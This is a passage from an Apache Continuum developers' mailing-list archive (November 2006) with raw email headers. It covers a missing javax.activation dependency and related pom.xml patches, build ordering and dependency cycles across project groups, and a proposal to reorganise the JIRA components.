java.lang.ClassNotFoundException: org.codehaus.plexus.mailsender.javamail.JavamailMailSender at java.net.URLClassLoader$1.run(URLClassLoader.java:200) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(URLClassLoader.java:188) at java.lang.ClassLoader.loadClass(ClassLoader.java:306) at org.codehaus.classworlds.RealmClassLoader.loadClassDirect(RealmClassLoader.java:195) at org.codehaus.classworlds.DefaultClassRealm.loadClass(DefaultClassRealm.java:255) at org.codehaus.plexus.component.factory.java.JavaComponentFactory.newInstance(JavaComponentFactory.java:30) ... 110 more Nov 9, 2006 6:05:01 PM org.apache.catalina.core.StandardContext start SEVERE: Error listenerStart Nov 9, 2006 6:05:01 PM org.apache.catalina.core.StandardContext start SEVERE: Context [/continuum] startup failed due to previous errors Regards, Graham -- From [email protected] Thu Nov 09 18:57:44 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77737 invoked from network); 9 Nov 2006 18:57:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 18:57:43 -0000 Received: (qmail 82045 invoked by uid 500); 9 Nov 2006 18:57:53 -0000 Delivered-To: [email protected] Received: (qmail 82022 invoked by uid 500); 9 Nov 2006 18:57:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82006 invoked by uid 99); 9 Nov 2006 18:57:53 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 10:57:53 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp2.israfil.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 10:57:38 -0800 Received: from [161.129.204.104] (unknown [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp2.israfil.net (Postfix) with ESMTP id 396FAAD43C8; Thu, 9 Nov 2006 14:15:06 -0500 (EST) Message-ID: <[email protected]> Date: Thu, 09 Nov 2006 13:57:07 -0500 From: Christian Edward Gruber <[email protected]> Organization: Israfil Consulting Services Corporation User-Agent: Thunderbird 161.129.204.104 (Windows/20061025) MIME-Version: 1.0 To: [email protected] CC: [email protected] Subject: Re: svn commit: r473012 - /maven/continuum/trunk/continuum-webapp/pom.xml References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/alternative; boundary="------------050709090207040503000007" X-Virus-Checked: Checked by ClamAV on apache.org --------------050709090207040503000007 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Doesn't the plexus-runtime need it too? Christian. [email protected] wrote: > Author: jmcconnell > Date: Thu Nov 9 10:39:25 2006 > New Revision: 473012 > > URL: http://svn.apache.org/viewvc?view=rev&rev=473012 > Log: > added activation dependency, it appears that WorkingCopyAction brings in this dependency so it ought to be marked as such, thanks to graham for noticing this > > Modified: > maven/continuum/trunk/continuum-webapp/pom.xml > > Modified: maven/continuum/trunk/continuum-webapp/pom.xml > URL: http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-webapp/pom.xml?view=diff&rev=473012&r1=473011&r2=473012 > ============================================================================== > --- maven/continuum/trunk/continuum-webapp/pom.xml (original) > +++ maven/continuum/trunk/continuum-webapp/pom.xml Thu Nov 9 10:39:25 2006 > @@ -416,5 +416,11 @@ > <artifactId>commons-lang</artifactId> > <version>2.1</version> > </dependency> > + <dependency> > + <groupId>javax.activation</groupId> > + <artifactId>activation</artifactId> > + <version>1.1</version> > + <scope>provided</scope> > + </dependency> > </dependencies> > </project> > > > -- *christian** gruber + process coach and architect* *Israfil Consulting Services Corporation* *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* --------------050709090207040503000007-- From [email protected] Thu Nov 09 19:10:13 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82119 invoked from network); 9 Nov 2006 19:10:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 19:10:12 -0000 Received: (qmail 11762 invoked by uid 500); 9 Nov 2006 19:10:22 -0000 Delivered-To: [email protected] Received: (qmail 11738 invoked by uid 500); 9 Nov 2006 19:10:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11727 invoked by uid 99); 9 Nov 2006 19:10:22 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 11:10:22 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 11:10:09 -0800 Received: by nf-out-0910.google.com with SMTP id l24so868222nfc for <[email protected]>; Thu, 09 Nov 2006 11:09:47 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=tFHerV1ODm2rUfqkx7iDY8Nz22vIIjjJCAoH6pd8KQ2BpK4t3JSzGgkbh1DyXYImLq7J9dvZ4f8NfPgIknp+4k1VsTNJjPdPOaQhkhmYVAu73LlQdLQtzwV3+1mhXgBj35om9WX8BVaAaWim51gyN5VeSXgfAeqM3v7/Z/uTZ3Q= Received: by 161.129.204.104 with SMTP id z16mr204511bud.1163099386352; Thu, 09 Nov 2006 11:09:46 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 9 Nov 2006 11:09:46 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 9 Nov 2006 13:09:46 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: svn commit: r473012 - /maven/continuum/trunk/continuum-webapp/pom.xml In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org point me where and I'll add it, but I just did a quick search in continuum and saw it referenced in the WorkingCopyAction so threw in the in pom jesse On 11/9/06, Christian Edward Gruber <[email protected]> wrote: > Doesn't the plexus-runtime need it too? > > Christian. > > [email protected] wrote: > > Author: jmcconnell > > Date: Thu Nov 9 10:39:25 2006 > > New Revision: 473012 > > > > URL: http://svn.apache.org/viewvc?view=rev&rev=473012 > > Log: > > added activation dependency, it appears that WorkingCopyAction brings in this dependency so it ought to be marked as such, thanks to graham for noticing this > > > > Modified: > > maven/continuum/trunk/continuum-webapp/pom.xml > > > > Modified: maven/continuum/trunk/continuum-webapp/pom.xml > > URL: http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-webapp/pom.xml?view=diff&rev=473012&r1=473011&r2=473012 > > ============================================================================== > > --- maven/continuum/trunk/continuum-webapp/pom.xml (original) > > +++ maven/continuum/trunk/continuum-webapp/pom.xml Thu Nov 9 10:39:25 2006 > > @@ -416,5 +416,11 @@ > > <artifactId>commons-lang</artifactId> > > <version>2.1</version> > > </dependency> > > + <dependency> > > + <groupId>javax.activation</groupId> > > + <artifactId>activation</artifactId> > > + <version>1.1</version> > > + <scope>provided</scope> > > + </dependency> > > </dependencies> > > </project> > > > > > > > > > -- > > *christian** gruber + process coach and architect* > > *Israfil Consulting Services Corporation* > > *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* > > > -- jesse mcconnell [email protected] From [email protected] Thu Nov 09 19:46:47 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95459 invoked from network); 9 Nov 2006 19:46:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 19:46:46 -0000 Received: (qmail 4744 invoked by uid 500); 9 Nov 2006 19:46:56 -0000 Delivered-To: [email protected] Received: (qmail 4722 invoked by uid 500); 9 Nov 2006 19:46:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4710 invoked by uid 99); 9 Nov 2006 19:46:56 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 11:46:56 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp2.israfil.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 11:46:41 -0800 Received: from [161.129.204.104] (unknown [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp2.israfil.net (Postfix) with ESMTP id EE543AD43C9 for <[email protected]>; Thu, 9 Nov 2006 15:04:12 -0500 (EST) Message-ID: <[email protected]> Date: Thu, 09 Nov 2006 14:46:17 -0500 From: Christian Edward Gruber <[email protected]> Organization: Israfil Consulting Services Corporation User-Agent: Thunderbird 161.129.204.104 (Windows/20061025) MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r473012 - /maven/continuum/trunk/continuum-webapp/pom.xml References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/alternative; boundary="------------090200070600010504040007" X-Virus-Checked: Checked by ClamAV on apache.org --------------090200070600010504040007 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit It needs to be declared in the plexus-runtime project, beside all the other runtime packaged jars. I would search in vi for javax and you'll probably find other ones you can put it beside. In the mean-time, I just did this: Index: continuum-plexus-runtime/pom.xml =================================================================== --- continuum-plexus-runtime/pom.xml (revision 466400) +++ continuum-plexus-runtime/pom.xml (working copy) @@ -66,6 +66,12 @@ <version>1.3.2</version> <scope>runtime</scope> </dependency> + <dependency> + <groupId>javax.activation</groupId> + <artifactId>activation</artifactId> + <version>1.1</version> + <scope>runtime</scope> + </dependency> </dependencies> <build> <plugins> ---- Cheers, Christian. Jesse McConnell wrote: > point me where and I'll add it, but I just did a quick search in > continuum and saw it referenced in the WorkingCopyAction so threw in > the in pom > > jesse > > On 11/9/06, Christian Edward Gruber <[email protected]> wrote: >> Doesn't the plexus-runtime need it too? >> >> Christian. >> >> [email protected] wrote: >> > Author: jmcconnell >> > Date: Thu Nov 9 10:39:25 2006 >> > New Revision: 473012 >> > >> > URL: http://svn.apache.org/viewvc?view=rev&rev=473012 >> > Log: >> > added activation dependency, it appears that WorkingCopyAction >> brings in this dependency so it ought to be marked as such, thanks to >> graham for noticing this >> > >> > Modified: >> > maven/continuum/trunk/continuum-webapp/pom.xml >> > >> > Modified: maven/continuum/trunk/continuum-webapp/pom.xml >> > URL: >> http://svn.apache.org/viewvc/maven/continuum/trunk/continuum-webapp/pom.xml?view=diff&rev=473012&r1=473011&r2=473012 >> >> > >> ============================================================================== >> >> > --- maven/continuum/trunk/continuum-webapp/pom.xml (original) >> > +++ maven/continuum/trunk/continuum-webapp/pom.xml Thu Nov 9 >> 10:39:25 2006 >> > @@ -416,5 +416,11 @@ >> > <artifactId>commons-lang</artifactId> >> > <version>2.1</version> >> > </dependency> >> > + <dependency> >> > + <groupId>javax.activation</groupId> >> > + <artifactId>activation</artifactId> >> > + <version>1.1</version> >> > + <scope>provided</scope> >> > + </dependency> >> > </dependencies> >> > </project> >> > >> > >> > >> >> >> -- >> >> *christian** gruber + process coach and architect* >> >> *Israfil Consulting Services Corporation* >> >> *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* >> >> >> > > -- *christian** gruber + process coach and architect* *Israfil Consulting Services Corporation* *email** [email protected] + bus 475-205-1887 + mob 475-205-1887* --------------090200070600010504040007-- From [email protected] Fri Nov 10 00:36:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77769 invoked from network); 10 Nov 2006 00:35:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Nov 2006 00:35:56 -0000 Received: (qmail 37662 invoked by uid 500); 10 Nov 2006 00:36:03 -0000 Delivered-To: [email protected] Received: (qmail 37634 invoked by uid 500); 10 Nov 2006 00:36:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37618 invoked by uid 99); 10 Nov 2006 00:36:02 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 16:36:02 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO customer-domains.icp-qv1-irony11.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 16:35:47 -0800 Received: from 203-158-38-82.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by customer-domains.icp-qv1-irony11.iinet.net.au with ESMTP; 10 Nov 2006 08:35:21 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAACJWU0XLniZSdGdsb2JhbAANjEMB X-IronPort-AV: i="4.09,407,1157299200"; d="scan'208"; a="25871672:sNHT505289475" Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: quoted-printable From: Brett Porter <[email protected]> Subject: Re: build scheduling issues Date: Fri, 10 Nov 2006 11:35:17 +1100 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org I'm lost :) My point below was that if you just took all the projects and sorted =20 them, there is no cycle in the example you gave. The cycle would come =20= if you tried to order them by groups, because there are dependencies =20 between projects within the groups in both directions. so... In 1.0.3, scheduling a project didn't build any dependencies, but if =20 you scheduled a bunch then they were built in order. I don't know =20 what happened if there were cycles. In trunk, it does what is below, or is that where you want to go with =20= it? And building dependencies is a next step on top of that? Honestly, I'm not seeing where cycles are going to be a common case, =20 and when they occur I don't think we need to be too concerned about =20 the order they build in. I have been extremely dense recently though =20 so I'm sure I'm missing something :) Cheers, Brett On 10/11/2006, at 2:20 AM, Jesse McConnell wrote: > sorry, once changed how? once the group dependencies are sorted out? > > if we are taking all projects across all groups and trying to generate > a cycle free graph then cycles are potentially a problem. > > just so we are clear in my mind: > > * grab all projects across all groups > * attempt to sort > * if success, build normally > * if failure, notify of cycle and proceed to sequentially process > groups, sorting projects in that group only and building > * if cycle detected in that group then build all projects in that > group in any old order that comes out of the database > > The difference between this and what used to exist before my group > changes is that it will attempt to order inside the group and build as > opposed to before where it would just failover to building all > projects in whatever order came from the db. > > is that where we are with this? > > jesse > > > > On 11/8/06, Brett Porter <[email protected]> wrote: >> That's a cycle between the groups, not the projects, so shouldn't be >> a problem once changed. >> >> - Brett >> >> On 09/11/2006, at 1:57 AM, Jesse McConnell wrote: >> >> > the issue isn't cycles within a normal m2 build, but when you =20 >> shove 4 >> > or 5 of them together into one continuum instance and then ask them >> > all to play together. >> > >> > For example if you shoved continuum, maven-shared and archiva =20 >> all into >> > the same continuum instance and triggered a build with all of =20 >> them in >> > the same directed graph then we have had instances of cycles in the >> > past (not sure about right now, mpir cycle might be refactored out >> > thanks to joakim). >> > >> > emm had another example last night when we were talking about it as >> > well. >> > >> > jesse >> > >> > On 11/8/06, Brett Porter <[email protected]> wrote: >> >> Sorry, am I missing something? How do we end up with a cycle in >> >> Continuum? Is there a specific example? >> >> >> >> I know it's possible - we had to allow it in the repository (eg, >> >> dom4j <-> jaxen), but it is certainly undesirable and honestly =20 >> should >> >> be rare, especially in m2 built artifacts. Should it produce a =20 >> build >> >> warning? >> >> >> >> Basically, the treatment there is to just stop following the tree >> >> when you hit the cycle, rather than changing the way things are >> >> ordered. So it's really arbitrary which might come first, but =20 >> isn't >> >> really a concern there. >> >> >> >> Anyway, just wondering. >> >> >> >> Cheers, >> >> Brett >> >> >> >> On 08/11/2006, at 11:46 PM, Emmanuel Venisse wrote: >> >> >> >> > Yes >> >> > >> >> > Jesse McConnell a =E9crit : >> >> >> we should add a page that analyzes each schedule for =20 >> cycles...that >> >> >> would be a cool little feature >> >> >> On 11/8/06, Emmanuel Venisse <[email protected]> wrote: >> >> >>> Yes, we need a global ordering, so projects will be build >> >> >>> independently of groups, because in some >> >> >>> case a cycle can be created between groups (not necessary =20 >> between >> >> >>> projects). >> >> >>> >> >> >>> In case a cycle is detected between projects, continuum can't >> >> >>> find the build order. In this case, I >> >> >>> think we need to sort a little project so will reduce build >> >> >>> errors. So if we have a cycle, we can >> >> >>> sort projects in a group and build them. In most of case =20 >> (maven >> >> >>> projects), we don't have a cycle in >> >> >>> a group. >> >> >>> >> >> >>> Emmanuel >> >> >>> >> >> >>> Brett Porter a =E9crit : >> >> >>> > I think you want global ordering. Grouping should just be a >> >> >>> > display/management technique, not anything that changes how >> >> >>> projects are >> >> >>> > handled. >> >> >>> > >> >> >>> > However, this needs to be reviewed as a whole (which I think >> >> >>> Emmanuel is >> >> >>> > doing), such that builds can be triggered when their >> >> >>> dependencies change >> >> >>> > which will help with the ordering as it won't be =20 >> dependant on >> >> >>> them all >> >> >>> > being triggered at the same time? >> >> >>> > >> >> >>> > - Brett >> >> >>> > >> >> >>> > On 08/11/2006, at 9:51 AM, Jesse McConnell wrote: >> >> >>> > >> >> >>> >> I was reading through the DefaultContinuum.buildProjects >> >> >>> ( Schedule id >> >> >>> >> ) method and after discussing some things with Emmanuel...I >> >> >>> think we >> >> >>> >> have a problem here. When I went through and refactored >> >> >>> things to >> >> >>> >> support a more Project Group centric setup with continuum I >> >> >>> changed >> >> >>> >> this method a bit. >> >> >>> >> >> >> >>> >> Originally, this method would gather up all projects that >> >> >>> would be >> >> >>> >> triggered by that schedule, run them all through the =20 >> project >> >> >>> sorter >> >> >>> >> and then build each in sequence. >> >> >>> >> >> >> >>> >> When I added the project groups to this mix, I changed =20 >> things >> >> >>> to be on >> >> >>> >> a project group basis, so that on a project group by =20 >> project >> >> >>> group >> >> >>> >> basis it would order the projects and build them. At the >> >> time I >> >> >>> >> thought this was the way to go...but maybe not. >> >> >>> >> >> >> >>> >> 17:14 <evenisse> we need to take all projects from all =20 >> groups, >> >> >>> sort them >> >> >>> >> 17:15 <evenisse> if we don't have a cycle, it's ok and we >> >> >>> build all >> >> >>> >> 17:15 <evenisse> if it isn't ok, we sort project by group >> >> >>> >> >> >> >>> >> For example, if we loaded up a Plexus group and a Maven >> >> >>> group...the >> >> >>> >> way it currently is (with my change) it would process all >> >> >>> triggered >> >> >>> >> builds within one group and then process all triggered =20 >> builds >> >> >>> in the >> >> >>> >> other group. This would not take into account potential >> >> >>> dependencies >> >> >>> >> between the two. >> >> >>> >> >> >> >>> >> Does anyone have any thoughts on this? I am inclined to =20= >> fix >> >> >>> it up so >> >> >>> >> its like it used to be where all projects across all =20 >> project >> >> >>> groups >> >> >>> >> are thrown into the graph....I keep feeling like I am =20 >> missing >> >> >>> >> something wrong with this, but I can't pin it down. >> >> >>> >> >> >> >>> >> One thing that perhaps Emmanuel could explain a bit more is >> >> >>> the third >> >> >>> >> comment there. In our conversation on this he said that he >> >> >>> thinks >> >> >>> >> that the cycles are cropping up all the time, and if =20 >> thats the >> >> >>> case >> >> >>> >> then we are building a lot of unordered builds which would >> >> >>> account for >> >> >>> >> some of the strange reports we have been getting. Are you >> >> >>> saying that >> >> >>> >> if we detect the cycle we default back to the way I am =20 >> doing >> >> >>> it now? >> >> >>> >> order within the groups... >> >> >>> >> >> >> >>> >> jesse >> >> >>> >> >> >> >>> >> >> >> >>> >> >> >> >>> >> >> >> >>> >> >> >> >>> >> --jesse mcconnell >> >> >>> >> [email protected] >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> >> >> >>> >> >> >> > >> > >> > -- >> > jesse mcconnell >> > [email protected] >> > > > --=20 > jesse mcconnell > [email protected] From [email protected] Fri Nov 10 18:13:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71463 invoked from network); 10 Nov 2006 18:13:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Nov 2006 18:13:06 -0000 Received: (qmail 8855 invoked by uid 500); 10 Nov 2006 18:13:16 -0000 Delivered-To: [email protected] Received: (qmail 8837 invoked by uid 500); 10 Nov 2006 18:13:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8826 invoked by uid 99); 10 Nov 2006 18:13:16 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 10:13:16 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 10:13:03 -0800 Received: by ug-out-1314.google.com with SMTP id j40so550382ugd for <[email protected]>; Fri, 10 Nov 2006 10:12:42 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=D7BYX8DJhQXszKdn5b4RnH4ed1ByG9rg03E3+Agi+yQLooY5Ic3piHaZmhxbaLaIf9iA7GFNxc+sgK3fIlmKQBUV7zZaFpSjDWHNEBwnDcvBt43kMNML1kE5TvhnCbtiTf+lR5fgZeRIABBJOv2TunXG8hFM2oUEyCGI09A1gvc= Received: by 161.129.204.104 with SMTP id a5mr379632bue.1163182360940; Fri, 10 Nov 2006 10:12:40 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 10 Nov 2006 10:12:40 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 10 Nov 2006 12:12:40 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: jira components MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org The current components in jira are (with current # of categoried issues): AOL Notifier 1 Core system 80 Database 16 Documentation 12 IRC Notifier 3 Jabber Notifier 3 Mail Notifier 14 MSN Notifier 2 Notification 5 Project Grouping 1 SCM 18 Web interface 107 XMLRPC Interface 12 No Component 61 I would like to propose reorganizing these a little bit, combining all of the Notifiers into the Notification component. Also add a component for the different integrations for issues related to Ant/Shell/M1 and M2 integrations, I think they are currently mostly getting split out between Web Interface and Core system. We also might be well served by breaking out the web interface into components: Web - Security, Web - Notification, Web - Groups, Web - Projects, Web - Other. thoughts? jesse -- jesse mcconnell [email protected] From [email protected] Fri Nov 10 19:31:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14848 invoked from network); 10 Nov 2006 19:31:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Nov 2006 19:31:30 -0000 Received: (qmail 66081 invoked by uid 500); 10 Nov 2006 19:31:41 -0000 Delivered-To: [email protected] Received: (qmail 66062 invoked by uid 500); 10 Nov 2006 19:31:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66051 invoked by uid 99); 10 Nov 2006 19:31:41 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 11:31:41 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 11:31:26 -0800 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 38EF64804B for <[email protected]>; Fri, 10 Nov 2006 11:31:04 -0800 (PST) Received: from [161.129.204.104] (c-66-56-51-227.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 62D9248013 for <[email protected]>; Fri, 10 Nov 2006 11:30:59 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 10 Nov 2006 14:34:53 -0500 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20060922) MIME-Version: 1.0 To: [email protected] Subject: Re: jira components References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org Breaking apart the notifiers are a good idea. However, due to natural language sort, they are not grouped very efficiently. How about "Notifier ___" instead? So, expanding your ideas to a the eventual list, we wind up with ... Core system 80 Database 16 Documentation 12 Integration M2 0 Integration M1 0 Integration Ant 0 Integration Shell 0 Notification Subsystem 5 Notifier (AOL) 1 Notifier (IRC) 3 Notifier (Jabber) 3 Notifier (Mail) 14 Notifier (MSN) 2 Notifier (Wagon) 0 Project Grouping 1 SCM 18 Web UI 89 Web Security 0 Web Groups 13 Web Projects 9 Web Configuration 2 XMLRPC Interface 12 No Component 61 Looks detailed. ;-) - Joakim Jesse McConnell wrote: > The current components in jira are (with current # of categoried issues): > > AOL Notifier 1 > Core system 80 > Database 16 > Documentation 12 > IRC Notifier 3 > Jabber Notifier 3 > Mail Notifier 14 > MSN Notifier 2 > Notification 5 > Project Grouping 1 > SCM 18 > Web interface 107 > XMLRPC Interface 12 > No Component 61 > > > I would like to propose reorganizing these a little bit, combining all > of the Notifiers into the Notification component. Also add a > component for the different integrations for issues related to > Ant/Shell/M1 and M2 integrations, I think they are currently mostly > getting split out between Web Interface and Core system. > > We also might be well served by breaking out the web interface into > components: Web - Security, Web - Notification, Web - Groups, Web - > Projects, Web - Other. > > thoughts? > > jesse > > > From [email protected] Fri Nov 10 19:42:32 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18934 invoked from network); 10 Nov 2006 19:42:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Nov 2006 19:42:17 -0000 Received: (qmail 88303 invoked by uid 500); 10 Nov 2006 19:42:28 -0000 Delivered-To: [email protected] Received: (qmail 88276 invoked by uid 500); 10 Nov 2006 19:42:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88259 invoked by uid 99); 10 Nov 2006 19:42:27 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 11:42:27 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 11:42:14 -0800 Received: by ug-out-1314.google.com with SMTP id j40so571095ugd for <[email protected]>; Fri, 10 Nov 2006 11:41:53 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; 